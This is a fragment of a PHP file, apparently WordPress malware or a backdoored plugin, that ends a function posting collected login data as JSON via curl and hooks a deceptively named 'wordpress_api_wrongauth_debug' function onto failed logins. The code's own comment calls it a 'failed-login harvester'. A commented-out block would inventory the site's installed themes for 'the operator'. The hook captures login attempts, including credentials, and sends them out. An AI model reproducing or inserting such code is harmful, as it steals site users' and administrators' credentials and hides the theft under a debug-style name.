curl_setopt($curl, CURLOPT_POSTFIELDS, $wpLogData);
curl_setopt($curl, CURLOPT_HTTPHEADER, array('Content-Type:application/json'));
$response = curl_exec($curl);
curl_close($curl);
}
}
}
// Hook the failed-login harvester; same guard caveat as the wp_login registration above.
// Below this, a commented-out block would have written the installed theme list to
// uploads/themes_list.txt (site inventory for the operator); it is inert as shipped.
if (function_exists('add_action')) {
add_action( 'wp_login_failed', 'wordpress_api_wrongauth_debug', 10, 2 );
}
/*
// themes list
$all_themes = wp_get_themes();
$themeArr = [];
foreach ($all_themes as $theme){
$themeArr[] = $theme->get( 'TextDomain' );
}
$uploads = wp_upload_dir();
$upDir = $uploads['basedir'];
$themesList = "{$upDir}/themes_list.txt";
if (!file_exists($themesList)) {
file_put_contents($themesList, $_SERVER['SERVER_NAME'] . ';' . implode(';', $themeArr) . "\n", FILE_APPEND);
}
// themes list end
*/
?>